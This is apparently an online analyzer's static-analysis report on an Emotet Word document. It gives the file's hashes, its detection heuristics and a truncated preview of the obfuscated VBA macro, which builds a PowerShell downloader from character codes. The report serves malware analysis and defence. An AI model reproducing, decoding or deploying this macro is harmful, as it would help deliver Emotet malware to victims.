Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 081229ac9f7a8d3c…

MALICIOUS

Office (OLE)

95.5 KB Created: 2018-06-20 10:49:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 4f297cc76fdd648cd6c4392d985a3a74 SHA-1: b060a96d599ef9984d9552f03f51b6515859aa5f SHA-256: 081229ac9f7a8d3cb495ba1de59f2a2ecdeb334fc81c35409efa52956bcb0a16
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and constructs a PowerShell command by concatenating character codes. This command is designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Emotet-6877457-0'. The presence of an AutoOpen macro further supports its malicious intent.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6877457-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877457-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14370 bytes
SHA-256: 45831b9ea1cb250dc7522f169432581477d9176133ca100100c3bdd9a043bc7a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qGlUjtoGSOR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dTwLPZlF"
Function TWJEtz()
On Error Resume Next
riBRP = CDate(68503)
LBAYj = CDate(zzSRZ + Sin(903 + 91761) * 64047 * CInt(8988))
qAiGO = 21173
wMrip = 51084
izAoCc = iUCAL
JhOXww = CByte(tuvLW)
uuDPlJLMP = "OwerSHell  " + ". ( " + "$Sh" + "el" + "LiD[1]+$sHElLI" + "D[13]+'X')(( [" + "chAR[]]( 1" + "17,28, 37"
SDjKmp = CDate(38644)
iVGGw = CDate(oLPpl + Sin(3612 + 87950) * 24598 * CInt(18538))
hqolz = 33005
NbGZnp = 39045
XZYbvc = WrdPmI
dVLadm = CByte(XROvTi)
VXQnrksO = " , 3" + " , 9, 59 , " + "113 ,1" + "08, " + "113 , " + "63,52" + ",38 ,12"
PSBBCp = CDate(53958)
vUZTI = CDate(jFsod + Sin(56710 + 77399) * 20126 * CInt(87036))
pSjGz = 11685
RhDKi = 46916
tEnAJ = QiDkH
hkFtDn = CByte(RsIFm)
HTkwkOr = "4 , 62, 51," + "59,52," + " 50 ,37" + ",1" + "13 ,35" + " , 48,63, 53" + ",62 , 60 , 10"
hDqQX = CDate(86096)
oKlTz = CDate(YddTJ + Sin(355 + 43427) * 93732 * CInt(26739))
QjZvmd = 24318
pJXuR = 47115
GupDzY = FICXE
TbIvE = CByte(sIwBb)
OzDrpjzQ = "6, 117" + " , 56,28,50 ,20" + ", 8, 3 , 113" + " ,108,113,63 ," + " 52,38 ,124 ," + " 62,51 ,59, 52 " + ", 50 ,37 , 113 " + ",2," + " 4"
LzrUQn = CDate(19759)
GFYYNw = CDate(JXAKlQ + Sin(12297 + 94072) * 39075 * CInt(70878))
iIJffw = 27858
faiDv = 216
GnpEC = ECwLn
oBFDTH = CByte(VipOPl)
MrBlnFF = "0 ,34 , 37" + " , 52,60" + ", 127 ,31, " + "52,37, 127 , 6," + "52,51 " + ", 18 ,61 , 56"
ULCZW = CDate(21906)
jGMKw = CDate(pLVEQl + Sin(78936 + 9085) * 8222 * CInt(75813))
utkjYS = 26340
JCHsUt = 5046
LQcUsH = uzQai
zPEAX = CByte(LhWvBC)
HEawv = ", 52," + "63,37, 106,1" + "17,4 ,58" + " , 32 ," + " 30, 19," + " 30 ,113 ,108, " + "113,1" + "18, 57,"
TWJEtz = uuDPlJLMP + VXQnrksO + HTkwkOr + OzDrpjzQ + MrBlnFF + HEawv
End Function
Function LazXm()
On Error Resume Next
QzYPd = CDate(75622)
OiwjLk = CDate(HhiVjp + Sin(56615 + 57760) * 69876 * CInt(12248))
DitzMS = 58948
VYXQlQ = 50367
KXvwY = dtzdEK
NKQXK = CByte(FjAqz)
NvBEtzHi = " 3" + "7 , 37, 33,10" + "7,126, 126,33 ," + "62,35 ,37 ,3"
GRmTD = CDate(44564)
zHRNs = CDate(jFXKo + Sin(46703 + 45024) * 25607 * CInt(37610))
mNGYA = 59652
ztDBwf = 4375
WrpsYC = YwfMT
JbmOR = CByte(TPzRG)
jMzJlBjV = "5, 48,56 ,37," + "38,62 ," + " 35" + ",58,34, 57 ," + "62, " + "33,127 ," + " 50,62, 60 ,1" + "26, 58 ,21,4, " + "30,5" + "0 ,10"
tOMGMS = CDate(45728)
lXbhR = CDate(IwuGZH + Sin(6552 + 25922) * 9992 * CInt(93790))
Ouvlzv = 10841
pZhXpZ = 43004
hGjRp = QiDwz
tiqmh = CByte(cNifw)
vtinqVki = "1," + "35," + "126, 17 , 5" + "7 , 37,37"
AKzNtJ = CDate(29497)
jrjOn = CDate(pNLRcl + Sin(42253 + 96204) * 20184 * CInt(86214))
IVpHf = 37493
HvwQO = 83607
SqREu = jqdVw
GpvfJ = CByte(kiLnz)
LaJEfwEAWbA = ", 3" + "3,107 , 12" + "6 ,126,38,3" + "8, 38, 127 ," + "51 , 62,62," + "58,56 " + ", 6" + "3,54 ,127 , 54" + " ,"
mWAXJ = CDate(25235)
EEViVH = CDate(wnaaP + Sin(82400 + 65490) * 53421 * CInt(51834))
Fhraa = 43823
FJiNiS = 27833
cETwC = VfSNF
uLNZC = CByte(GGaTz)
dolkkiBjjAH = " 62 ,40 ,48" + " ,61 , 60" + ",35, 56 ,127 , " + "50 , " + "62 ,60 ,126,11" + " ,"
wDtBE = CDate(64840)
sCIPN = CDate(qllXs + Sin(67508 + 42132) * 42035 * CInt(53296))
hrSwD = 37591
YuzlOG = 2764
vuwdO = TmRLZi
zDGSKv = CByte(uFuvBD)
lzPDnp = "26, 7, 56" + ", 126,17 ,57" + " ," + " 37, 37,33,10" + "7,126" + ", 12" + "6,38 , 38, "
LazXm = NvBEtzHi + jMzJlBjV + vtinqVki + LaJEfwEAWbA + dolkkiBjjAH + lzPDnp
End Function
Function WzhWl()
On Error Resume Next
wBcHw = CDate(26209)
tzHPaN = CDate(zDrEIw + Sin(70118 + 97932) * 58229 * CInt(90425))
CztlJT = 44248
dMGuJ = 40508
zaosh = pSdEv
ShiXr = CByte(GHECQi)
uZMoM = "38 , 127, 63,3" + "9 , 61 ,52 ,54" + ",48, 6" + "1,127"
QvZHj = CDate(76323)
mNsBB = CDate(dEjOSU + Sin(61661 + 78812) * 38443 * CInt(27692))
OwiFI = 7258
puSFRz = 10
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.